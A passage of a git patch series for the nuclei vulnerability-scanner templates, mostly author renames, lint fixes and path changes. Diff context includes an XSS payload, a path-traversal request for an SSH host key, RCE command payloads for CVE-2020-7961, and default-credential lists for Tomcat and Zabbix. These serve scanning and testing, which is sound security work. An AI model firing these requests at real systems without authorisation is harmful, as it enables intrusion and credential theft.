   name: Ruby-on-Rails Database Configuration Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposures/configs/symfony-database-config.yaml b/exposures/configs/symfony-database-config.yaml
index b116547087..a524f9c594 100755
--- a/exposures/configs/symfony-database-config.yaml
+++ b/exposures/configs/symfony-database-config.yaml
@@ -2,7 +2,7 @@ id: symfony-database-config
 
 info:
   name: Symfony Database Configuration Exposure
-  author: Ice3man
+  author: pd-team
   severity: high
 
 requests:
diff --git a/exposures/configs/symfony-profiler.yaml b/exposures/configs/symfony-profiler.yaml
index 6b7b9d5810..f7f9b55c4f 100644
--- a/exposures/configs/symfony-profiler.yaml
+++ b/exposures/configs/symfony-profiler.yaml
@@ -2,7 +2,7 @@ id: symfony-profiler
 
 info:
   name: Symfony Profiler
-  author: ice3man
+  author: pd-team
   severity: high
 
 requests:
diff --git a/exposures/logs/rails-debug-mode.yaml b/exposures/logs/rails-debug-mode.yaml
index f696b5ce6c..911965ae65 100644
--- a/exposures/logs/rails-debug-mode.yaml
+++ b/exposures/logs/rails-debug-mode.yaml
@@ -2,7 +2,7 @@ id: rails-debug-mode
 
 info:
   name: Rails Debug Mode Enabled
-  author: ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml
index 0ec3c41f8e..70aab59bc4 100644
--- a/exposures/logs/struts-debug-mode.yaml
+++ b/exposures/logs/struts-debug-mode.yaml
@@ -2,7 +2,7 @@ id: struts-debug-mode
 
 info:
   name: Apache Struts setup in Debug-Mode
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/misconfiguration/airflow-api-exposure.yaml b/misconfiguration/airflow-api-exposure.yaml
index 0efc1b2c65..4416e443ff 100755
--- a/misconfiguration/airflow-api-exposure.yaml
+++ b/misconfiguration/airflow-api-exposure.yaml
@@ -2,7 +2,7 @@ id: airflow-api-exposure
 
 info:
   name: Apache Airflow API Exposure / Unauthenticated Access
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/misconfiguration/hadoop-unauth.yaml b/misconfiguration/hadoop-unauth.yaml
index 825453b763..a034f23851 100644
--- a/misconfiguration/hadoop-unauth.yaml
+++ b/misconfiguration/hadoop-unauth.yaml
@@ -2,7 +2,7 @@ id: hadoop-unauth
 
 info:
   name: Apache Hadoop Unauth
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/vulnerabilities/other/acme-xss.yaml b/vulnerabilities/other/acme-xss.yaml
index 5a5e4e8ef5..21d9d0e5d9 100755
--- a/vulnerabilities/other/acme-xss.yaml
+++ b/vulnerabilities/other/acme-xss.yaml
@@ -2,7 +2,7 @@ id: acme-xss
 
 info:
   name: ACME / Let's Encrypt Reflected XSS
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml
index cef9244755..08503a9b4d 100644
--- a/vulnerabilities/other/aspnuke-openredirect.yaml
+++ b/vulnerabilities/other/aspnuke-openredirect.yaml
@@ -1,7 +1,8 @@
 id: aspnuke-openredirect
+
 info:
   name: ASP-Nuke Open Redirect
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/vulnerabilities/other/yarn-resourcemanager-rce.yaml
index ddc7fc4c4c..7742c5a40e 100755
--- a/vulnerabilities/other/yarn-resourcemanager-rce.yaml
+++ b/vulnerabilities/other/yarn-resourcemanager-rce.yaml
@@ -2,7 +2,7 @@ id: yarn-resourcemanager-rce
 
 info:
   name: Apache Yarn ResourceManager RCE
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:

From f2f7ada0ffdf6053b1a3d7cc4af252b38f633676 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sun, 10 Jan 2021 19:46:50 +0530
Subject: [PATCH 31/85] few more updates

---
 dns/cname-service-detector.yaml                | 2 +-
 dns/servfail-refused-hosts.yaml                | 2 +-
 exposed-panels/citrix-vpn-detect.yaml          | 2 +-
 exposed-panels/parallels-html-client.yaml      | 2 +-
 exposed-panels/phpmyadmin-panel.yaml           | 2 +-
 exposures/configs/phpinfo.yaml                 | 2 +-
 exposures/configs/server-status-localhost.yaml | 2 +-
 misconfiguration/jkstatus-manager.yaml         | 2 +-
 8 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/dns/cname-service-detector.yaml b/dns/cname-service-detector.yaml
index ae512f5426..2e68cb7bf3 100644
--- a/dns/cname-service-detector.yaml
+++ b/dns/cname-service-detector.yaml
@@ -2,7 +2,7 @@ id: cname-service-detector
 
 info:
   name: 3rd party service checker
-  author: bauthard
+  author: pd-team
   severity: info
 
 dns:
diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml
index 2bcf3e5844..fe7781fa91 100644
--- a/dns/servfail-refused-hosts.yaml
+++ b/dns/servfail-refused-hosts.yaml
@@ -2,7 +2,7 @@ id: servfail-refused-hosts
 
 info:
   name: Servfail Host Finder
-  author: mzack9999
+  author: pd-team
   severity: info
 
 dns:
diff --git a/exposed-panels/citrix-vpn-detect.yaml b/exposed-panels/citrix-vpn-detect.yaml
index 96c7e2071e..7ce6621e15 100644
--- a/exposed-panels/citrix-vpn-detect.yaml
+++ b/exposed-panels/citrix-vpn-detect.yaml
@@ -2,7 +2,7 @@ id: citrix-vpn-detect
 
 info:
   name: Citrix VPN Detection
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:
diff --git a/exposed-panels/parallels-html-client.yaml b/exposed-panels/parallels-html-client.yaml
index 3e436e4e34..4602cc5ce4 100644
--- a/exposed-panels/parallels-html-client.yaml
+++ b/exposed-panels/parallels-html-client.yaml
@@ -2,7 +2,7 @@ id: parallels-html-client
 
 info:
   name: Parallels HTML5 Client
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:
diff --git a/exposed-panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml
index 93a1badb12..f8ce001dc1 100644
--- a/exposed-panels/phpmyadmin-panel.yaml
+++ b/exposed-panels/phpmyadmin-panel.yaml
@@ -2,7 +2,7 @@ id: phpmyadmin-panel
 
 info:
   name: phpMyAdmin Panel
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:
diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml
index 61cd1b1dc6..7836d74b54 100644
--- a/exposures/configs/phpinfo.yaml
+++ b/exposures/configs/phpinfo.yaml
@@ -2,7 +2,7 @@ id: phpinfo-files
 
 info:
   name: phpinfo Disclosure
-  author: bauthard
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposures/configs/server-status-localhost.yaml b/exposures/configs/server-status-localhost.yaml
index 1482d55fec..f5916e1911 100644
--- a/exposures/configs/server-status-localhost.yaml
+++ b/exposures/configs/server-status-localhost.yaml
@@ -2,7 +2,7 @@ id: server-status-localhost
 
 info:
   name: Server Status Disclosure
-  author: bauthard & geeknik
+  author: pd-team & geeknik
   severity: low
 
 requests:
diff --git a/misconfiguration/jkstatus-manager.yaml b/misconfiguration/jkstatus-manager.yaml
index 06deaae295..53669fd626 100644
--- a/misconfiguration/jkstatus-manager.yaml
+++ b/misconfiguration/jkstatus-manager.yaml
@@ -2,7 +2,7 @@ id: jkstatus-manager
 
 info:
   name: JK Status Manager
-  author: bauthard
+  author: pd-team
   severity: low
 
 requests:

From 32efba63f772e6f50ab41b53dfb6b534d7ad568b Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sun, 10 Jan 2021 20:25:57 +0530
Subject: [PATCH 32/85] few more changes

---
 exposed-panels/active-admin-exposure.yaml |   2 +-
 exposed-panels/adminer-exposure.yaml      | 125 ----------------------
 exposed-panels/atlassian-crowd-panel.yaml |   1 +
 exposed-panels/webmin-panel.yaml          |   1 -
 4 files changed, 2 insertions(+), 127 deletions(-)
 delete mode 100755 exposed-panels/adminer-exposure.yaml

diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml
index 75933eb847..5584c76461 100755
--- a/exposed-panels/active-admin-exposure.yaml
+++ b/exposed-panels/active-admin-exposure.yaml
@@ -3,7 +3,7 @@ id: active-admin-exposure
 info:
   name: ActiveAdmin Admin Dasboard Exposure
   author: pd-team
-  severity: medium
+  severity: info
 
 requests:
   - method: GET
diff --git a/exposed-panels/adminer-exposure.yaml b/exposed-panels/adminer-exposure.yaml
deleted file mode 100755
index 265940f3ea..0000000000
--- a/exposed-panels/adminer-exposure.yaml
+++ /dev/null
@@ -1,125 +0,0 @@
-id: adminer-exposure
-
-info:
-  name: Adminer Exposure
-  author: pd-team
-  severity: medium
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/adminer-4.7.0.php'
-      - '{{BaseURL}}/adminer-4.6.0-mysql-en.php'
-      - '{{BaseURL}}/adminer/adminer.php'
-      - '{{BaseURL}}/adminer-4.6.0-en.php'
-      - '{{BaseURL}}/adminer-4.6.2-mysql.php'
-      - '{{BaseURL}}/adminer-4.6.1-mysql.php'
-      - '{{BaseURL}}/adminer-4.7.2.php'
-      - '{{BaseURL}}/adminer-4.0.1/'
-      - '{{BaseURL}}/adminer-4.6.3-mysql-en.php'
-      - '{{BaseURL}}/adminer-4.3.1-mysql-en.php'
-      - '{{BaseURL}}/adminer-3.3.1/'
-      - '{{BaseURL}}/adminer-3.6.1/'
-      - '{{BaseURL}}/adminer-4.6.2.php'
-      - '{{BaseURL}}/adminer-4.0.3.php'
-      - '{{BaseURL}}/adminer-4.3.0.php'
-      - '{{BaseURL}}/adminer-4.6.1.php'
-      - '{{BaseURL}}/adminer-4.2.5-en.php'
-      - '{{BaseURL}}/data/adminer.php'
-      - '{{BaseURL}}/adminer/index.php'
-      - '{{BaseURL}}/adminer-4.2.0.php'
-      - '{{BaseURL}}/adminer-4.5.0-mysql.php'
-      - '{{BaseURL}}/admin/adminer.php'
-      - '{{BaseURL}}/adminer-4.7.2-mysql.php'
-      - '{{BaseURL}}/adminer-4.2.2/'
-      - '{{BaseURL}}/adminer-4.5.0.php'
-      - '{{BaseURL}}/adminer-3.6.0/'
-      - '{{BaseURL}}/webadminer.php'
-      - '{{BaseURL}}/adminer-4.0.3/'
-      - '{{BaseURL}}/adminer-4.1.0.php'
-      - '{{BaseURL}}/adminer-3.3.2/'
-      - '{{BaseURL}}/adminer-4.6.2-en.php'
-      - '{{BaseURL}}/adminer-4.7.1-mysql.php'
-      - '{{BaseURL}}/public/adminer.php'
-      - '{{BaseURL}}/adminer-4.1.0/'
-      - '{{BaseURL}}/adminer-4.5.0-en.php'
-      - '{{BaseURL}}/adminer-4.2.4/'
-      - '{{BaseURL}}/adminer-4.6.2-mysql-en.php'
-      - '{{BaseURL}}/adminer.php'
-      - '{{BaseURL}}/adminer-4.7.0-mysql-en.php'
-      - '{{BaseURL}}/adminer-4.4.0-mysql.php'
-      - '{{BaseURL}}/adminer-4.3.1.php'
-      - '{{BaseURL}}/adminer-4.6.0-mysql.php'
-      - '{{BaseURL}}/adminer-4.2.3/'
-      - '{{BaseURL}}/_adminer.php'
-      - '{{BaseURL}}/adminer-3.3.3/'
-      - '{{BaseURL}}/adminer-3.3.0/'
-      - '{{BaseURL}}/php/adminer.php'
-      - '{{BaseURL}}/adminer-3.1.0/'
-      - '{{BaseURL}}/adminer-4.6.3-mysql.php'
-      - '{{BaseURL}}/adminer-4.7.2-mysql-en.php'
-      - '{{BaseURL}}/adminer-4.4.0-en.php'
-      - '{{BaseURL}}/publicadminer.php'
-      - '{{BaseURL}}/adminer1.php'
-      - '{{BaseURL}}/adminer-4.7.3-mysql.php'
-      - '{{BaseURL}}/adminer-4.6.3-en.php'
-      - '{{BaseURL}}/adminer-4.2.5-mysql-en.php'
-      - '{{BaseURL}}/adminer-3.0.0/'
-      - '{{BaseURL}}/adminer-3.5.0/'
-      - '{{BaseURL}}/adminer-3.6.4/'
-      - '{{BaseURL}}/adminer-4.7.3-mysql-en.php'
-      - '{{BaseURL}}/adminer-3.2.2/'
-      - '{{BaseURL}}/adminer-3.0.1/'
-      - '{{BaseURL}}/tools/adminer.php'
-      - '{{BaseURL}}/adminer-4.7.1.php'
-      - '{{BaseURL}}/adminer-4.0.3-mysql.php'
-      - '{{BaseURL}}/adminer-4.2.5-mysql.php'
-      - '{{BaseURL}}/adminer-3.5.1/'
-      - '{{BaseURL}}/adminer-3.6.3/'
-      - '{{BaseURL}}/adminer-4.3.0-mysql-en.php'
-      - '{{BaseURL}}/web/adminer.php'
-      - '{{BaseURL}}/adminer-3.2.1/'
-      - '{{BaseURL}}/adminer/'
-      - '{{BaseURL}}/adminer-4.6.2-cs.php'
-      - '{{BaseURL}}/adminer-4.2.0-mysql.php'
-      - '{{BaseURL}}/adminer-4.5.0-mysql-en.php'
-      - '{{BaseURL}}/adminer-4.3.1-mysql.php'
-      - '{{BaseURL}}/adminer-4.1.0-mysql.php'
-      - '{{BaseURL}}/adminer-4.7.1-mysql-en.php'
-      - '{{BaseURL}}/adminer-4.3.1-en.php'
-      - '{{BaseURL}}/adminer-4.7.0-en.php'
-      - '{{BaseURL}}/adminer-4.6.1-mysql-en.php'
-      - '{{BaseURL}}/adminer-4.7.2-en.php'
-      - '{{BaseURL}}/adminer-4.2.0/'
-      - '{{BaseURL}}/adminer-3.6.2/'
-      - '{{BaseURL}}/adminer-4.4.0-mysql-en.php'
-      - '{{BaseURL}}/toolsadminer.php'
-      - '{{BaseURL}}/adminer-3.7.0/'
-      - '{{BaseURL}}/adminer-4.2.5.php'
-      - '{{BaseURL}}/adminer-3.2.0/'
-      - '{{BaseURL}}/adminer-4.4.0.php'
-      - '{{BaseURL}}/adminer-4.7.3.php'
-      - '{{BaseURL}}/adminer-4.3.0-en.php'
-      - '{{BaseURL}}/adminer-4.6.3.php'
-      - '{{BaseURL}}/adminer-4.0.2/'
-      - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
-      - '{{BaseURL}}/adminer-3.4.0/'
-      - '{{BaseURL}}/adminer-4.0.0/'
-      - '{{BaseURL}}/adminer-4.7.1-en.php'
-      - '{{BaseURL}}/adminer-4.3.0-mysql.php'
-      - '{{BaseURL}}/adminer-4.2.1/'
-      - '{{BaseURL}}/adminer-4.6.0.php'
-      - '{{BaseURL}}/adminer-3.7.1/'
-      - '{{BaseURL}}/adminadminer.php'
-      - '{{BaseURL}}/adminer-3.3.4/'
-      - '{{BaseURL}}/adminer-4.6.1-en.php'
-      - '{{BaseURL}}/adminer-4.7.3-en.php'
-      - '{{BaseURL}}/adminer-4.7.0-mysql.php'
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Login - Adminer"
-      - type: status
-        status:
-          - 200
diff --git a/exposed-panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml
index c2f2c4aa9d..6b6d3e01f3 100644
--- a/exposed-panels/atlassian-crowd-panel.yaml
+++ b/exposed-panels/atlassian-crowd-panel.yaml
@@ -1,4 +1,5 @@
 id: atlassian-crowd-panel
+
 info:
   name: Atlassian Crowd panel detect
   author: organiccrap
diff --git a/exposed-panels/webmin-panel.yaml b/exposed-panels/webmin-panel.yaml
index 179d36e3fd..ef6329dbed 100644
--- a/exposed-panels/webmin-panel.yaml
+++ b/exposed-panels/webmin-panel.yaml
@@ -10,7 +10,6 @@ requests:
     path:
       - "{{BaseURL}}/"
       - "{{BaseURL}}/webmin/"
-      - "{{BaseURL}}:10000/"
     redirects: true
     matchers:
       - type: word

From 8a12488c3241fffd9094112d6bdf7a7a4b44758d Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sun, 10 Jan 2021 20:33:44 +0530
Subject: [PATCH 33/85] moving folders

---
 default-logins/{ => ambari}/ambari-default-credentials.yaml | 0
 default-logins/{ => ofbiz}/ofbiz-default-credentials.yaml   | 0
 default-logins/{ => zabbix}/zabbix-default-credentials.yaml | 0
 3 files changed, 0 insertions(+), 0 deletions(-)
 rename default-logins/{ => ambari}/ambari-default-credentials.yaml (100%)
 rename default-logins/{ => ofbiz}/ofbiz-default-credentials.yaml (100%)
 rename default-logins/{ => zabbix}/zabbix-default-credentials.yaml (100%)

diff --git a/default-logins/ambari-default-credentials.yaml b/default-logins/ambari/ambari-default-credentials.yaml
similarity index 100%
rename from default-logins/ambari-default-credentials.yaml
rename to default-logins/ambari/ambari-default-credentials.yaml
diff --git a/default-logins/ofbiz-default-credentials.yaml b/default-logins/ofbiz/ofbiz-default-credentials.yaml
similarity index 100%
rename from default-logins/ofbiz-default-credentials.yaml
rename to default-logins/ofbiz/ofbiz-default-credentials.yaml
diff --git a/default-logins/zabbix-default-credentials.yaml b/default-logins/zabbix/zabbix-default-credentials.yaml
similarity index 100%
rename from default-logins/zabbix-default-credentials.yaml
rename to default-logins/zabbix/zabbix-default-credentials.yaml

From b80ca7732d243d1200e63949df934a5c69273df8 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 03:31:24 +0530
Subject: [PATCH 34/85] linting errors

---
 default-logins/activemq/activemq-default-login.yaml | 2 +-
 vulnerabilities/other/acme-xss.yaml                 | 5 +++--
 2 files changed, 4 insertions(+), 3 deletions(-)

diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index fb1f8264f8..6107ee0961 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -18,5 +18,5 @@ requests:
           - '<h2>Broker</h2>'
         condition: and
 
-    # We could add a request condition block to only send this request if the 
+    # We could add a request condition block to only send this request if the
     # site response URL had activeMQ broker stuff in the source.
diff --git a/vulnerabilities/other/acme-xss.yaml b/vulnerabilities/other/acme-xss.yaml
index 21d9d0e5d9..cf0a4bb769 100755
--- a/vulnerabilities/other/acme-xss.yaml
+++ b/vulnerabilities/other/acme-xss.yaml
@@ -9,12 +9,13 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
           - "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain&#x29;</x:script>"
       - type: word
-        words: 
+        words:
           - "/xml"
           - "/html"
-    matchers-condition: and
\ No newline at end of file

From b5dd30abf5851b301b32adbeff9643bf322dc781 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 04:09:54 +0530
Subject: [PATCH 35/85] fixes

---
 cves/2020/CVE-2020-12116.yaml                      | 14 --------------
 cves/2020/CVE-2020-7318.yaml                       | 10 +++-------
 cves/2020/CVE-2020-7961.yaml                       |  7 ++-----
 default-logins/apache/tomcat-manager-default.yaml  | 14 +++++++-------
 misconfiguration/aem-groovyconsole.yaml            |  1 -
 vulnerabilities/jenkins/jenkins-stack-trace.yaml   |  1 -
 .../jenkins/unauthenticated-jenkin-dashboard.yaml  |  3 ---
 7 files changed, 12 insertions(+), 38 deletions(-)

diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml
index c151685af6..8a9d30a1e8 100644
--- a/cves/2020/CVE-2020-12116.yaml
+++ b/cves/2020/CVE-2020-12116.yaml
@@ -17,12 +17,6 @@ requests:
         Accept: */*
         Connection: close
 
-      - |
-        GET / HTTP/1.1
-        Host: {{Hostname}}:8060
-        Accept: */*
-        Connection: close
-
       - |
         GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
         Host: {{Hostname}}
@@ -31,14 +25,6 @@ requests:
         Connection: close
         Referer: http://{{Hostname}}
 
-      - |
-        GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
-        Host: {{Hostname}}:8060
-        Accept: */*
-        Cache-Control: max-age=0
-        Connection: close
-        Referer: http://{{Hostname}}:8060/
-
     extractors:
       - type: regex
         name: endpoint
diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml
index 84aad2501b..d29ca52b32 100644
--- a/cves/2020/CVE-2020-7318.yaml
+++ b/cves/2020/CVE-2020-7318.yaml
@@ -14,16 +14,12 @@ info:
     - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
 
 requests:
-  - payloads:
-      port:
-        - "80"
-        - "443"
-        - "8443"
-    raw:
+  - raw:
       - |
         GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
-        Host: {{Hostname}}:§port§
+        Host: {{Hostname}}
         Connection: close
+
     matchers-condition: and
     matchers:
       - type: status
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index 37212b88b1..00be0fad26 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -18,15 +18,12 @@ requests:
         - "systeminfo"  # Windows
         - "lsb_release -a"  # Linux
         - "sysctl kern.ostype"  # macOS
-      port:
-        - "80"
-        - "443"
-        - "8080"
+
     attack: sniper
     raw:
       - |
         POST /api/jsonws/invoke HTTP/1.1
-        Host: {{Hostname}}:§port§
+        Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
         Content-Length: 4938
         Accept: */*
diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml
index 1c93bbd828..d25c590171 100644
--- a/default-logins/apache/tomcat-manager-default.yaml
+++ b/default-logins/apache/tomcat-manager-default.yaml
@@ -8,15 +8,15 @@ requests:
 
   - payloads:
       username:
-        - admin
+          - admin
 
       password:
-        - admin
-        - guest
-        - password
-        - test
-        - 12345
-        - 123456
+          - admin
+          - guest
+          - password
+          - test
+          - 12345
+          - 123456
 
     attack: clusterbomb  # Available options: sniper, pitchfork and clusterbomb
 
diff --git a/misconfiguration/aem-groovyconsole.yaml b/misconfiguration/aem-groovyconsole.yaml
index dfcbf4c4a6..42fe2cd71e 100644
--- a/misconfiguration/aem-groovyconsole.yaml
+++ b/misconfiguration/aem-groovyconsole.yaml
@@ -13,7 +13,6 @@ requests:
       - "{{BaseURL}}/groovyconsole"
     headers:
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-      Accept-Encoding: gzip, deflate
       Accept-Language: en-US,en;q=0.9,hi;q=0.8
       User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
 
diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
index c55c472c61..b59ac27ad3 100644
--- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml
+++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
@@ -14,7 +14,6 @@ requests:
 
     headers:
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-      Accept-Encoding: gzip, deflate
       Accept-Language: en-US,en;q=0.9,hi;q=0.8
       User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
 
diff --git a/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml b/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml
index 2ef759e29c..9a9e8fcb1b 100644
--- a/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml
+++ b/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml
@@ -9,9 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}"
-      - "{{BaseURL}}:8080"
-      - "{{BaseURL}}:9090"
-      - "{{BaseURL}}:8888"
 
     matchers-condition: and
     matchers:

From d393389ecfbaeb0eb3ae20125060c0117e8b5d20 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 04:11:44 +0530
Subject: [PATCH 36/85] Update zabbix-default-credentials.yaml

---
 default-logins/zabbix/zabbix-default-credentials.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/default-logins/zabbix/zabbix-default-credentials.yaml b/default-logins/zabbix/zabbix-default-credentials.yaml
index 7bbdf1d241..05b267ef73 100755
--- a/default-logins/zabbix/zabbix-default-credentials.yaml
+++ b/default-logins/zabbix/zabbix-default-credentials.yaml
@@ -10,8 +10,8 @@ requests:
     path:
       - '{{BaseURL}}/index.php'
     headers:
-      - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-      - X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
     body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
 
     matchers-condition: and

From 6beee02685cf15710f0b42188ae7d41908a43dc7 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Sun, 10 Jan 2021 22:46:55 +0000
Subject: [PATCH 37/85] Auto Update README [Sun Jan 10 22:46:55 UTC 2021]
 :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 5e467fbb7d..20a58c714c 100644
--- a/README.md
+++ b/README.md
@@ -16,7 +16,7 @@ An overview of the nuclei template directory including number of templates and H
 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
 | cves               | 147             | files                     | 51                     |
-| vulnerabilities    | 42    | panels                    | 50                    |
+| vulnerabilities    | 43    | panels                    | 50                    |
 | technologies       | 41       | security-misconfiguration | 29 |
 | workflows          | 17          | tokens                    | 8                    |
 | dns                | 6                | fuzzing                   | 6                   |
@@ -447,6 +447,7 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── springboot-h2-db-rce.yaml
 │   ├── symantec-messaging-gateway.yaml
 │   ├── symfony-debugmode.yaml
+│   ├── thinkific-redirect.yaml
 │   ├── tikiwiki-reflected-xss.yaml
 │   ├── tomcat-manager-pathnormalization.yaml
 │   ├── twig-php-ssti.yaml
@@ -484,7 +485,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**24 directories, 425 files**.
+**24 directories, 426 files**.
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 

From 9ab927f60c4e11d06a7e29241c5e5d5165e29b35 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 04:24:00 +0530
Subject: [PATCH 38/85] lint fixes

---
 default-logins/apache/tomcat-manager-default.yaml  | 14 +++++++-------
 .../zabbix/zabbix-default-credentials.yaml         |  5 +++--
 exposures/configs/composer-config.yaml             |  2 +-
 3 files changed, 11 insertions(+), 10 deletions(-)

diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml
index d25c590171..1c93bbd828 100644
--- a/default-logins/apache/tomcat-manager-default.yaml
+++ b/default-logins/apache/tomcat-manager-default.yaml
@@ -8,15 +8,15 @@ requests:
 
   - payloads:
       username:
-          - admin
+        - admin
 
       password:
-          - admin
-          - guest
-          - password
-          - test
-          - 12345
-          - 123456
+        - admin
+        - guest
+        - password
+        - test
+        - 12345
+        - 123456
 
     attack: clusterbomb  # Available options: sniper, pitchfork and clusterbomb
 
diff --git a/default-logins/zabbix/zabbix-default-credentials.yaml b/default-logins/zabbix/zabbix-default-credentials.yaml
index 05b267ef73..c876466114 100755
--- a/default-logins/zabbix/zabbix-default-credentials.yaml
+++ b/default-logins/zabbix/zabbix-default-credentials.yaml
@@ -10,8 +10,9 @@ requests:
     path:
       - '{{BaseURL}}/index.php'
     headers:
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-Requested-With: XMLHttpRequest
+      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+      X-Requested-With: XMLHttpRequest
+
     body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
 
     matchers-condition: and
diff --git a/exposures/configs/composer-config.yaml b/exposures/configs/composer-config.yaml
index 9db5816cfd..b3a9afeebb 100644
--- a/exposures/configs/composer-config.yaml
+++ b/exposures/configs/composer-config.yaml
@@ -1,4 +1,4 @@
-id: development-config-file
+id: composer-config
 
 info:
   name: composer-config-file

From d69ce217e81fbba708600f730afbedc5afa958d6 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 04:50:14 +0530
Subject: [PATCH 39/85] fixes

---
 exposed-tokens/generic/credentials-disclosure.yaml |  7 ++++++-
 exposed-tokens/generic/general-tokens.yaml         | 11 ++++++++---
 exposed-tokens/generic/http-username-password.yaml |  4 +++-
 exposures/apis/swagger-api.yaml                    |  2 +-
 misconfiguration/unauthenticated-nacos-access.yaml |  6 +++---
